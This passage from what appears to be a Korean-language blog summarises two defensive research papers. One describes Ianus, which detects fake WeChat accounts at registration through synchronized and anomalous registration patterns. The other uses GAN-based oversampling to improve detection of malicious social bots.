즉, sync-anomaly score는 binary feature(True or False)들의 합으로 산출이 된다. 그러나 단순하게 더하는 것은 각 feature들의 weight 가 고려되지 않는 방식이므로, ML 의 logistic regression을 통해 sync-anomaly score에 적용되는 weight를 학습할 것이다. 이후에 graph를 그릴 때 각 노드를 연결하는 edge에 이 sync-anomaly score가 들어갈 것이다.

Sybil detection 단계에서는 실제 Sybils 를 탐지하는 단계로, community detection 알고리즘이 사용된다. 각 노드들에는 weighted node degree가 존재하는데, 이는 해당 노드와 연결된 edge의 weight에 비례해 결정된다. 따라서 특정 노드의 degree가 높다면, 해당 노드가 sybil일 확률이 높은 것이다.

이러한 node degree based community detection 알고리즘을 사용하여 Sybil detection을 수행하게 된다.

세번째로, 제안한 Lanus 모델을 평가하기 위해 WeChat 데이터를 사용할 것이다. 평가한 결과 Lanus는 80.2%의 recall과 92.4%의 precision이라는 높은 성능으로 잘 동작하는 것을 확인할 수 있었다.

특히 각 단계별로 다양한 design을 적용함으로써 성능을 확인하였다. 예를 들어 feature extraction 단계에서는 synchronization based feature와 anomaly based feature가 상호 보완적으로 동작한 다는 것을 확인 했으며, 이 두 feature를 잘 결합할 경우 높은 성능을 나타내는 것을 확인할 수 있었다.

또한 graph building 단계에서는 logistic regression을 통해 각 feature별로 서로 다른 weight를 적용하였을 때 높은 성능을 내는 것을 확인할 수 있었다.

마지막으로 Sybil detecion 단계에서는 community detection 방식으로 Louvain method를 사용해보았다.

하지만, 실제 실험 결과 Louvain method에 비해 본 논문에서 제안하는 node degree based community detecion 방식을 사용하였을 때, 탐지에 걸리는 시간이 훨씬 줄어드는 것을 확인할 수 있었다.

그 결과, WeChat에서는 Ianus가 하루에 400K 정도의 새로운 registred account를 확인할 수 있고 정확도 또한 96% 정도의 성능을 낸다고 평가하였다.

요약해보면, 본 논문에서는 크게 3가지의 contributions를 가진다.

1) large-scale의 데이터 분석을 통해 Sybils 와 benign account의 특징을 잡아냈다. Sybils는 synchronized와 abnormal registration 패턴을 동시에 가짐을 확인할 수 있었다.

2) Ianus는 각 노드들 간의 synchronized & abnormal pattern과 graph 구조 분석을 통해 Sybils를 탐지할 수 있음을 보였다.

3) 제안한 Ianus를 WeChat의 registration 데이터를 통해 평가하였고, 실제 WeChat에서 Ianus를 사용하는 등 실제 환경에서도 Ianus가 잘 동작함을 보였다.

2. Related work

기존의 sybil detection 기법들은 대부분 사용자들의 content, behavior나 sybils로부터 생성된 social graph 를 활용하는 경우가 많다.

특히 social graph를 이용해 grpah-based ML 기술을사용한 연구들의 경우, 사용자들의 rich feature를 기반으로 동작하기 때문에 delay가 발생한다는 문제가 있다.

하지만 본 논문에서 제안하는 Ianus의 경우, registration 데이터만을 사용하므로 delay가 매우 적다.

3. Measuring registration patterns

3.1. WeChat and Dataset

WeChat 은 현재 중국에서 가장 인기있는 OSN(Online Social Network)이다.

본 연구팀은 WeChat에서 benign & sybil user의 accounts를 획득하였다. WeChat 보안팀에 의하면 해당 데이터셋의 라벨링은 약 95%의 정확도를 가지고 있다. 100%가 아니라 살짝 문제가 될 순 있지만, 본 연구팀에서는 이정도는 크게 개의치 않을 것이라 판단하였다.

데이터셋의 데이터들은 아래 [그림 1]과 같은 Attributes를 가진다.

[그림 1] WeChat 데이터셋 attributes

3.2. Synchronization

Sybils들은 registration 과정에서 공통적인 패턴을 가진다.

본 논문에서는 이 공통적인 패턴을 'Synchronizaed register patterns'라 부를 것이다. 지금부터 각 attributes 별로 이 synchronized 패턴의 measurement 결과를 살펴보자.

1) IP

WeChat은 IPv4 주소를 지원한다. 물론 최근 CIDR 과 같은 주소 체계는 prefix가 같다고 무조건 같은 위치에서 접속한 것이라는 보장은 없지만, 실험결과 그냥 그렇다고 생각할 때 의미 있는 결과가 나왔기에, 같은 prefix가 유의미 하다고 가정하였다.

그림 2의 (a) 그림과 같이 그래프로 Account의 수와 Prefixes 의 수를 매핑해본 결과, power law를 따르는 분포가 나왔으며, 80%의 account들이 benign 과 sybil account들의 경우 각각 34.5%, 15.5% 의 prefix 에서 registration 된 것을 확인할 수 있었다. 즉, sybil account는 benign account에 비해 특정 prefix 에 몰려있는 것이다.

또한 그림 2의 (b) 그림은 특정 IP prefix에 account가 가입된 경우, Sybil account의 비율을 나타낸 것이다. 그림에서 볼 수 있듯이, 비교적 적은 수의 accounts들이 동일한 IP prefix를 통해 가입된 경우, sybil 이라 할 순 없지만, 비교적 많은 수의 accounts 들이 동일한 IP prefix를 통해 가입된 경우, 해당 accounts들이 sybils 일 확률이 높았다.

[그림 2] Number of accounts & Number of IP prefixes / Fraction of sybils

2) Phone number

전화 번호의 경우, 마지막 4자리를 제외하면 지역번호와 통신사 번호로 할당된다. 따라서 본 논문에서는 마지막 4자리는 삭제된 채로 실험을 진행하였다.

measurement 결과, IP 와 거의 비슷한 경향을 나타냈는데, 그 결과는 [그림 3]과 같다. Sybils account일 경우 특정 전화 번호에 몰리는 경향이 있으며, 비교적 많은 수의 accounts 들이 동일한 전화 번호를 사용할 경우, sybil account일 확률이 높았다.

[그림 3] Number of accounts & Number of phone prefixes / Fraction of sybils

3) Device

[그림 4]에서 확인할 수 있듯이, Device도 IP나 Phone number와 같은 경향을 가지고 있다.

[그림 4] Number of accounts & Number of devices / Fraction of sybils

4) nickname

[그림 5]에서 확인할 수 있듯이, Sybil account의 경우, nickname으로 소문자+숫자 조합이나 숫자+소문자+숫자 조합을 많이 사용한 것을 확인할 수 있다.

[그림 5] nickname 패턴

위와 같은 attributes의 결과를 통해 단순하게 Sybil detector를 만들 수도 있다. 예를 들어 하루에 특정 개수 이상의 동일한 IP prefix를 사용할 경우, Sybil account라고 판단하면 거의 100%의 precision을 가질 수 있다.

하지만, 본 데이터셋에 이렇게 단순한 detector를 구현할 경우, 단지 59%의 recall을 나타낸다. 즉, Sybil account가 있더라도 절반은 탐지를 못하고 놓친다는 말이다.

따라서 본 연구에서는 이번 절에서 살펴본 synchronization patterns of attributes 뿐 아니라, 다음 절에서 살펴볼 anomaly patternes 또한 고려할 것이다.

3.3. Anomaly

앞서 살펴본 synchronization 패턴만 가지고는 sybils를 가려내는데 한계가 있다. 예를 들어 특정 IP prefix에서 여러개의 accounts들이 가입을 했다고 했을 때 이를 sybils나 bening account 라고 단정하기는 어렵다.

하지만 특정 시간대 (예를 들어 새벽)에 동시에 여러개의 accounts들이 가입을 한다면 이는 abnormal 한 패턴이고, 이럴 경우 sybils 일 확률이 더 올라간다. 다양한 anomaly 패턴들을 살펴보자.

1) Registration time

아래 [그림 6]은 특정 IP prefix를 사용해 가입한 accounts에 대하여 가입 시간을 그래프로 나타낸 것이다. 대체적으로 benign accounts들은 낮이나 밤에 가입을 자주 하며, sybil accounts들은 새벽에 동시다발적으로 가입을 하는 경향을 띄는 것을 확인할 수 있다.

[그림 6] nubmer of accounts registerd from IP prefix in each 15 minutes

2) Geolocation inconsistency

IP 주소나 전화번호 정보는 위치 정보와도 매핑될 수 있는 정보이다. 데이터셋에서 관측해본 결과 대부분의 sybils들은 동일한 위치에서 가입을 하지 않는 것으로 나타났다.

이는 cloud나 remote compomise machine을 이용하기 때문일 것으로 추측하고 있다.

3) Rare and outdated WeChat and OS versions

데이터셋을 관측해본 결과, 대부분의 sybil accounts 들은 오래된 WeChat 버전이나 OS 버전을 사용하는 것으로 나타나고 있다.

4. Design of Ianus

4.1. Overview

[그림 7] Overview of Ianus

Ianus의 전체적인 구조는 [그림 7]과 같다. Ianus 는 크게 3단계를 거쳐 동작하게 되는데, 1) Feature extraction 2) Graph building 3) Sybil detection 이다.

우선 Feature extration 단계에서는 앞서 3장에서 설명한 measurement 기준에 의거하여 각 attributes에 대하여 Synchronization based features와 anomaly based features를 수집한다.

graph building 단계에서는 weighted graph를 생성하여 heterogeneous 한 features들을 integrate 하는 역할을 수행한다. Sybil Node들은 densly 하게 연결되어 있으며 높은 weight 값을 가지고, benign Node 들은 sparse 하게 연결되어 있으며 낮은 weight 값을 가지게 될 것이다.

각 weight 값을 매기기 위해서 두 account 사이의 synchronized & anomaly 패턴을 기반으로 sync-anomaly score를 측정하였다.

Sybil detection 단계에서는 앞서 생성한 registration graph 를 분석하여 Sybils를 탐지하는 과정이다. 분석에는 community detection 알고리즘과 같은 기법이 적용될 수 있다. 본 논문에서는 community detection 방식과 비슷한 성능을 내지만 훨씬 빠르게 동작하는 simple weighted node degree based method를 제안하였다.

만약 특정 Node의 weighted degree가 threshold 값보다 높으면 sybils 라고 판단하는데, 이 threshold 값은 ML 을 통해 학습될 것이다.

4.2. Extracting Features

앞서 살펴보았듯이 Features로는 synchronization based features와 anomaly based features를 수집한다. synchronization based features들은 2개의 registrations 쌍 사이에서 산출되며, features들은 binary 이다. 예를 들어 registration A와 B사이에 feature 1이 유효하다면 1, 유효하지 않다면 0으로 표현하는 것이다.

반대로 anomaly based features들은 쌍으로 계산하는것이 아니라, 각 노드마다 individual 하게 계산한 뒤, 두개의 registration 각각의 anomaly based feature 값을 concatenate 하는 형태로 합치게 된다.

Synchronization based features는 [그림 8]과 같으며, Anomaly based features 는 [그림 9]과 같다.

[그림 8] Synchronization based features

[그림 9] Anomaly based features

4.3. Building a Registration Graph

registration graph의 최종 목표는 accounts로 대표되는 Node 중에서, sybils 의 경우 더 큰 weight 값으로 edge들이 이어지게 만드는 것이다.

각 노드 쌍의 score를 계산하기 위해서는 feature들로부터 ML 학습을 진행하게 된다. 이 socre를 sync-anomaly score라 부르고, 해당 score를 기준으로 registration graph를 생성하게 된다.

sync-anomaly score를 계산할 때 가장 중요한 것은 synchronization based feature와 anomaly based feature의 가중치를 계산하는 것이다. 데이터셋에서 registration 정보와 labels이 포함된 historical 데이터를 통해 학습을 진행하였다.

즉, 제공된 feature값과 label을 통해 logistic regression classifier 모델을 설계했고, 그 결과값을 sync-anomaly score로 산출하였다. 이 때 graph 에서는 두 노드 사이에서 benign인지 sybils 인지 labeling을 해야 한다.

가장 간단하게 labelling 하는 방법은 두 Node의 label을 활용하는 것이다. 만약 한 쌍의 노드에서 둘 다 benign 이라면, 해당 edge를 benign으로 labelling 하고, 둘 다 sybils 하다면 해당 edge를 sybil로 labelling하면 된다.

하지만, 이런 방식은 inconsistency를 일으킬 수 있다. 두 쌍의 Nodes들이 있을 때, randomness에 의해 같은 features를 가진다고 하더라도 다르게 labelling될 수 있다.

이러한 inconsistency는 ML 학습 과정에서 여러 문제를 발생시킬 수 있다. 따라서 본 연구에서는 labelling을 진행할 때, 데이터셋 내에서 모든 가능한 pairs of registration 쌍을 고려한 뒤, labelling을 해주는 것이다.

예를 들어 특정 feature vectors를 가지는 노드 쌍들이 대부분 Sybils 라면 해당 edge를 sybils 라고 labelling 하는 것이다. 이러한 과정을 통해 Sybils 가 아닌 두 노드들은 최대한 densly 연결되지 않도록 구성할 수 있다.

Positive label를 부여하는 threshold값을 높이면, 한 쌍의 benign accounts들이 더 연결되지 않도록 된다. 이제 각 쌍의 노드마다 feature vectors와 label이 준비되어 있다. 이제 이 두 정보를 가지고 sync-anomaly score 를 학습하게 된다.

logistic regression classifier에 input 값으로 feature vecotrs가 들어가고, output 값으로 해당 edge 가 positive label일 확률이 나오게 된다. 해당 확률과 label 값을 통해 학습을 시켜주고 난 뒤, 각 노드 쌍마다 해당 classifier 를 적용시키면 확률값이 output으로 나오게 되고, 이것을 sync-anomaly score로 사용하게 된다.

다시한번 강조하지만 본 장에서의 목적은 sybils 노드 끼리는 densly 연결되게 하고, benign 노드는 최대한 격리시키도록 만드는 graph를 구성하는 것이다. 이를 구현하기 위해서 graph를 그릴 때, 두 노드가 모두 sybils 라고 판단될 경우에만 edge를 그렸다.

즉, 이 말은 두 노드 사이의 sync-anomlay score가 0.5를 넘는 경우에만 edge를 그었고, edge의 weight 로 sync-anomaly score를 사용했다. 하지만, 데이터의 수가 많은 경우 모든 노드 쌍에 대하여 sync-anomaly score를 계산하는 것은 굉장히 어렵다.

따라서 이 문제를 해결하기 위해 registration attributes (IP prefix, phone number, device ID) 가 동일한 노드 쌍에 대해서만 sync-anomaly score를 계산하고, 해당 값이 0.5가 넘을 경우에 edge를 그어주는 식으로 구현하였다. 4.4. Detecting Sybils 앞서 생성한 registration graph를 기반으로 sybils를 탐지하는 단계이다.

sybil accounts들은 densly connected 되어있고 benign accounts 들은 sparse connected 되어있기 때문에, community detection 알고리즘을 적용해볼 수 있으며, 그 중 가장 유명한 Louvain method를 적용해볼 수 있다. 또 다른 방법으로는 simple weighted node degree based method를 적용해볼 수 있다.

weighted degree of a node는 단순하게 해당 노드에 연결된 모든 edge들의 weight 를 더함으로써 계산될 수 있다. 즉, 특정 노드가 다른 노드들과 많이 연결되어 있을수록 sybils 할 확률이 높은 것이다.

하지만, weighted node degree 이 가능한 값은 굉장히 큰 범위를 가지기 때문에, 탐지 정확도를 떨어트릴 수 있다. 이를 해결하기 위해 tanh 함수를 통해 normalize 해주는 과정을 거치게 된다.

이제 이렇게 normalize된 weighted node degree 값을 binary classification classifier 에 적용시킬 수 있는데, 본 연구에서는 앙상블 기법 중 하나인 EasyEnsemble 모델을 사용하였다. 해당 모델을 사용하면 imbalance 한 데이터셋의 문제를 해결해줄 수 있다. (물론 본 연구의 데이터셋이 크게 imbalance 한 것은 아니다만...) 해당 방식으로 실험을 진행해본 결과, Louvain method 와 비슷한 정확도를 뽑아내면서도 훨씬 빠른 성능을 나타내는 것을 확인할 수 있었다.

5. Evaluation

5.1. Experimental Setup

우선 사용된 데이터셋으로는 각 다른 시기에 획득한 WeChat의 2개의 데이터셋을 사용하였다. 앞서 3장에서 획득한 attributes들의 measurments들은 모두 Dataset 2를 사용해 얻어진 결과이다.

또한 sync-anomaly score를 얻는 과정에서도 학습 데이터셋이 필요했다. 이 학습 데이터셋은 Dataset 1 의 일부를 가져와 학습시켰으며, Ianus를 테스트 하는데에는 Dataset 2 를 사용했다.

Ianus 를 evaluation 할 때는 1) variants of Ianus 와 비교하는 method와 2) Popularity-based method 로 나눠 진행하였다. 우선 variants of Ianus로는 Ianus, Ianus-Sync & Ianus-Anomaly(feature로 synchronization or anomaly based feature 하나만 쓰는 방식), Ianus-FS (edge를 그리는 threshold 값 다르게), Ianus-CD (Louvain method 사용), Ianus-FS-CD 등이 있다.

또한 Popularity-based method는 앞서 3.2장에서 본 것처럼 단순히 attributes 의 popularity가 높으면 sybils 라고 판단하는 방식이다.

예를 들어 특정 IP prefix의 popularity가 높으면 이에 해당하는 모든 노드들을 Sybils 라고 판단하는 방식이다.

5.2. Results

1) Ianus is effective

우선 Ianus 를 통해 dataset2를 테스트해 본 결과, 92.4% Precision, 80.2% Recall, 85.9% F-Score를 나타냈다. 이는 Ianus가 효과적으로 sybils 를 탐지하고 있음을 알 수 있다.

또한 registration graph에서 community의 size에 따라서 false positive 비율이 상이하게 나타는 것을 확인할 수 있었다. 대체적으로 community size가 너무 작거나 크면 false positive 비율이 증가하는 것을 확인할 수 있다.

2) Impact of the threshold of Sybil support ratio

[그림 10] Impact of the threshold & Fraction of Dataset on Ianus

[그림 10]의 a에서 확인할 수 있듯이 threshold of sybil support 가 0.95에서 0.98로 증가할수록 Precision은 증가하고 Recall이 감소하는 것을 확인할 수 있었다.

또한 0.98에서 0.99로 증가할수록 Precision은 조금 증가하지만 Recall이 급격하게 감소하는 것을 확인할 수 있었다. 따라서 본 시스템에서 0.98을 threshold of sybil support로 채택하였다.

3) Impact of the training dataset size

[그림 9]의 b에서 확인할 수 있듯이 dataset 1의 데이터 중 1%를 사용했을 경우에서 10%를 사용했을 경우로 갈수록 Precision이 증가하고 Recall이 감소하는 것을 확인할 수 있었다. 다만, 10%가 넘어서는 stable한 상태에 접어들게 되므로, 굳이 10% 이상의 많은 수의 데이터를 학습과정에 사용할 필요는 없는 것으로 나타났다.

4) Ianus vs Ianus-Sync & Ianus-Anomaly

[그림 11] Comparing Ianus, Ianus-Sync, Ianus-Anomaly

[그림 11]의 a에서 확인할 수 있듯이 두개의 feature중 하나만 사용하는 것보다 둘 다 사용하는 것이 전체적인 성능에 좋음을 알 수 있다.

왜냐하면 Synchronization based feature와 Anomaly based feature는 서로 complementary 관계에 있기 때문이다.

5) Feature weights

[그림 11]의 b에서 확인할 수 있듯이 Ianus에 사용되는 모든 Features 들은 모두 positive한 weights를 가지고 있다. 즉 모든 features들이 Ianus의 성능(sync-anomaly scores 측정)에 positive한 방향으로 영향을 미친다는 것이다.

이때 OS 버전이라던지, device 정보 들은 공격자들이 쉽게 바꿀 수 있지만, Ianus에 큰 impact를 미치는 features들이다. 따라서 공격자들이 이러한 정보들을 바꾼다면 Ianus 가 우회될 여지가 있긴 하다.

하지만 이러한 쉽게 공격자들이 바꿀 수 있는 features들을 모두 제거하고 IP 기반 features등과 같이 공격자들이 수정하기 어려운 features들만 가지고 Ianus를 구현해도 93.6%의 precision과 45.1%의 recall을 나타낸다.

즉, 이 방식을 채택하면 모든 sybils 를 잡을 수는 없겠지만 정확도는 여전히 높은 수준으로 동작 가능하다.

6) Ianus vs Ianus-FS

sync-anomaly score를 기반으로 edge를 그릴때의 threshold 값을 유동적으로 조절할 수 있는 Ianus-FS에서, threshold 값에 따른 성능 변화는 [그림 12]과 같다.

threshold값이 4일 경우, 가장 F-score가 높았으며 Ianus 시스템에 비해서는 4% 정도 낮은 F-score를 기록하였다.

[그림 12] Comparing Ianus with Ianus-FS

7) Ianus vs Iaus-CD

Louvain method 를 사용하는 Ianus-CD의 경우, [그림 13]에서 볼 수 있듯이 성능적인 면에서는 별 차이가 없지만, 속도적인 면에서 큰 차이가 있기 때문에 Louvain method보다는 weighted node degree based method를 Ianus 에 사용하였다.

[그림 13] Comparing Ianus with Ianus-CD

8) Ianus vs Ianus-FS-CD

Ianus-FS-CD는 Ianus-FS와 Ianus-CD를 모두 고려한 시스템으로, 총 두개의 threshold 값을 고려하게 된다. feature sum의 값이 4일 경우 가장 성능이 좋았으며, 그 경우 community size의 threshold 변화에 따른 성능은 [그림 14]와 같았다.

Precision은 Ianus에 비해 낮고, Recall은 Ianus에 비해 조금 좋은 것을 확인할 수 있다.

[그림 14] Comparing Ianus with Ianus-FS-CD

9) Ianus vs popularity-based methods

IP prefix, phone number prefix, device ID attirbutes만을 사용하는 popularity-based methods와 Ianus를 비교한 결과는 [그림 15]와 같았다.

전체적으로 보았을 때, IP prefix를 사용할 경우 성능이 매우 낮았으며, 나머지의 경우 threshold 값을 늘리면 precision은 증가했으나 recall이 급격히 줄어드는 것을 확인할 수 있었다.

종합적인 F-score 지표는 세 시스템 모두 Ianus에 비해 낮은 것을 확인할 수 있었다.

[그림 15] Comparing Ianus with popularity-based methods (IP prefix)

하지만, Ianus와 Phone number prefix, device ID를 사용한 popularity-based methods를 결합한 시스템에서는 [그림 16]와 같이 Ianus와 거의 동일한 precision으로 더 높은 recall과 F-score를 나타내는 것을 확인할 수 있었다. 이는 Ianus와 Phone-Device popularity based methods가 complementary한 관계로 동작할 수 있음을 보여준다.

[그림 16] Comparing Ianus with popularity-based methods (Phone number prefix)

6. Discussion and limitations

Ianus는 적은 cost로도 바꿀수 있는 features 값을 공격자가 조작함으로써 우회될 수 있다. 하지만, 공격자가 조작하기 어려운 features들로만 시스템을 설계해도 나쁘지 않은 성능을 나타내고 있다.

또한, Ianus는 많은 수의 benign users를 Sybils로 가입하게 모으는 crowdturfing 을 통해서도 Ianus를 공격할 수 있지만, crowdturfing을 막는 방식은 따로 있기 때문에 크게 고려하지 않았다. Ianus는 높은 Precision을 가졌지만 recall은 비교적 높지 않다. 이러한 문제를 해결하기 위해서는 다른 타입의 데이터 (content, behavior 등) 역시 활용해야 할 것으로 예상된다.

7. Conclusion and future work

본 연구에서는 WeChat의 데이터의 synchronized & abnormal 패턴을 통해 Sybils를 탐지하는 Ianus 시스템을 제안하였다. 각 노드 쌍에 대해 synchronization & anomaly features를 추출하였으며, 이를 통해 graph를 building 하였다.

Ianus는 좋은 성능을 가지며, 효과적으로 Sybil attack을 탐지하는 것을 알 수 있었으며, 실제 WeChat에서 해당 시스템을 채택하기도 하였다. 앞으로 본 연구팀에서는 unsupervised Sybil detection based on registration data에 관한 연구를 수행할 예정이라고 한다.

Reference

Dong Yuan, Yuanli Miao, Neil Zhenqiang Gong, Zheng Yang, Qi Li, Dawn Song, Qian Wang, and Xiao Liang, "Detecting Fake Accounts in Online Social Networks at the Time of Registrations." , In Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security (CCS '19), 2019

[논문] Detecting Malicious Social Robots with Generative Adversarial Networks

dong1 — Wed, 2 Mar 2022 00:42:39 +0900

논문 제목 : Detecting Malicious Social Robots with Generative Adversarial Networks

0. Abstract

인터넷 환경에서 Malicious social robots들은 부정적이고 허위 정보를 인터넷 상에서 뿌리는 악행을 저지른다.

지금까지의 연구는 이러한 malicious robots들을 단순 classification을 통해 색출하려고 해왔지만, unbalanced 한 데이터셋 등의 문제 (malicious robots의 데이터가 너무 적음) 만족할만한 성과를 내지는 못하고 있다.

본 논문에서는 이러한 데이터셋 불균형의 문제를 해결하기 위해 GAN 네트워크를 통해 데이터를 생성한 뒤 학습하는 방안을 제안한다.

해당 제안의 타당성을 검증하기 위해 5가지의 oversampling 기법과 비교를 하였고, 그 결과 GAN을 이용한 방식이 가장 높은 F1 score 성능을 가짐을 보였다. 또한, imbalance degree가 15%가 넘지 않는 이상, GAN 을 사용한 방법이 잘 동작함을 보였다.

1. Introduction

사회적으로 나쁜 영향을 미치고 있는 malicious robots 문제를 해결하기 위해 여러 classification 모델들이 고안되었지만, 정상적인 사용자에 대한 데이터가 불균형하게 많은 데이터셋 문제 때문에 여러가지 어려움을 겪고 있다.

본 논문에서는 GAN을 이용해 이러한 데이터 불균형 문제를 해결하고 보다 정확한 모델 학습을 진행할 것이다. 전체 과정을 [그림 1]과 같다.

[그림 1] 전체 연구 진행 과정

2. Related work

다양한 연구에서 malicious robots을 탐지하기 위한 ML 기반 연구들이 수행되었다.

해당 연구들에서 사용한 feature로는, user metadata & content feature, N시간동안 친구 요청 및 응답 횟수, account 정보, 언어 정보 등을 사용하였으며, featrue 정보를 사용하지 않고 click stream 정보를 사용하기도 하였다.

또한 CNN + LSTM 모델을 사용해 모델을 구성하기도 하였고, 사용자 노드 간의 graph를 통해 sybil attack 을 탐지하는 연구 또한 수행되어왔다.

3. Social robot detection based on GANs

social robot detection 문제는 사실 binary classification 문제이다. social account의 집합 A = {a1, a2, ... , aA} 가 있을 때 각 account 들은 두개의 원소를 가지는 집합 C = {Cr, Cn} 둘 중에 하나로 분류된다. Cr은 robot account들을 나타내며, Cn 은 정상적인 사용자들의 account 를 나타낸다.

이 과정에서 Cr 의 데이터가 너무 적으므로 GAN을 통해 일종의 augmentation을 진행해준다. 전체 과정은 [그림 2]와 같다.

[그림 2] social robot detection framework

우선 Feature extraction 과정에서는 각 account를 잘 나타내주는 11가지의 feature를 선택하였다. 11가지의 feature로는 average number of topic tags, # of user mentions, # of links, # of retweets, # of favorites, ratio of followers, tweet source, similarity content, similarity of tweet length, similarity of punctuation usage, similarity of stop words 정보를 선정하였다.

1) 이제 전체 데이터셋을 training set T와 test set S로 나눈 뒤, T를 C_0 라는 모델을 학습시킨다.

2) 다음으로 T의 일부 데이터로 구성된 데이터셋 F를 이용해 GAN 네트워크인 G*를 학습시킨 뒤, random noise z를 G*을 통해 데이터셋 F`을 생성해낸다. 이제 F`과 T를 이용해 C_a 라는 모델을 학습시킨다.

즉, 그냥 원래 imbalance 한 데이터셋으로 학습시킨 모델 C_0와 GAN을 통해 balance를 맞춘 데이터셋으로 학습시킨 모델 C_a를 비교하는 것이다.

4. Experiments and analyses

[그림 3]과 같이 1971개의 정상적인 account와 462개의 social robot account로 이루어진 데이터셋을 통해 실험을 진행하였다.

[그림 3] dataset

모델의 성능을 평가하기 위한 지표로는 대표적으로 자주 쓰이는 Accuracy, Precision, Recall, F-measure 를 사용하였다.

본 논문에서 제안한 oversampling 기법인 GAN의 성능을 비교하기 위해, 다른 oversampling 기법들인 SMOTE, SMOTE-Borderline1, 2, SMOTE-SVM, ADASYN 과의 비교를 수행하였다.

GAN과 classification 모델의 최적의 성능을 위한 hyper parameter는 grid search 방식을 통해 선정하였다. D와 G를 학습시킨 learning curve 는 [그림 4]와 같다.

[그림 4] learning graph of D &amp; G

실험은 다음 4가지 질문에 답하는 방향으로 수행되었다.

4.1. GAN이 robot detection의 성능 향상에 도움을 주는가?

이를 검증하기 위해 다른 oversampling 기법과 GAN을 사용했을때의 성능 차이를 확인해보았다. 그 결과는 아래 [그림 5]와 같다.

[그림 5] experiment result 1

전체적으로 보았을 때, orginal 데이터셋에 비해 GAN 을 사용했을 때 더 좋은 성능을 내는 것을 확인할 수 있었다. 특히 accuracy 부분에서는 큰 차이를 보이지는 않았지만, F-measure 부분에서 기존의 데이터셋에 비해 7% 높은 성능을 확인할 수 있었다.

4.2. GAN이 다른 oversampling 기법에 비해 성능이 좋은가?

이 역시 [그림 5]를 통해 확인해볼 수 있다. 대체적으로 다른 oversampling 기법들에 비해 좋은 성능을 나타내는 것을 확인할 수 있다.

4.3. 어느정도 비율의 oversampling을 해야 가장 성능이 좋은가?

이를 알아보기 위해 (실제 test 데이터 속의 robots 데이터 수) : (oversampling을 통해 생성한 robots 데이터 수) 비율을 1:1, 2:1, 4:1, 6:1, 8:1 비율로 진행하여 각각의 데이터셋에 대해 실험을 진행하였다. 그 결과는 [그림 6]과 같았다.

[그림 6] experiment result 2

실험 결과, SMOTE-SVM과 GAN을 제외한 나머지 oversampling 기법들은 original 데이터에 비해 낮은 성능을 보이는 것을 확인할 수 있었다. 특히 GAN 방식이 가장 stable한 것을 확인할 수 있다.

4.4. 기존의 데이터셋의 imbalance 비율에 의한 성능 차이는 어떠한가?

이를 알아보기 위해 기존의 데이터셋에서 실제 account와 robots 의 account 비율을 6%, 9%, 12%, 15%, 18%로 설정한 뒤, 각 oversampling 기법을 통해 oversampling 한 후 결과를 측정하였다. 그 결과는 [그림 7]과 같다.

[그림 7] experiment result 3

위 결과에서 알 수 있듯이, 기존 데이터셋에서 robots의 비율이 증가할수록 classification 성능은 대체적으로 감소하는 것을 확인할 수 있었다.

이는 기존 데이터셋에서 robots의 비율이 증가하면, oversampling의 위력이 약해지는 것으로 해석된다. 즉 굳이 oversampling하지 않고도 학습이 잘 진행되고, 오히려 oversampling 기법이 학습에 방해가 되는 것이다.

GAN은 기존 데이터셋에서 robots의 비율이 10% 남짓일 경우에도 다른 oversampling 기법에 비해 성능이 좋은 것을 확인할 수 있었다.

5. Conclusion

본 연구에서는 social robot account detection 과정에서 문제가 되었던 imbalance 데이터셋 문제를 해결하기 위해 oversampling 기법으로 GAN을 활용하였으며, 그 성능을 측정하기 위해 다른 oversampling 기법과 비교를 진행하였다.

그 결과, GAN이 가장 안정적이고 좋은 성능을 내는 것을 확인할 수 있었다.

Reference

Bin Wu, Le Liu, et al. "Detecting Malicious Social Robots with Generative Adversarial Networks." KSII Transactions on Internet and Information Systems (2019)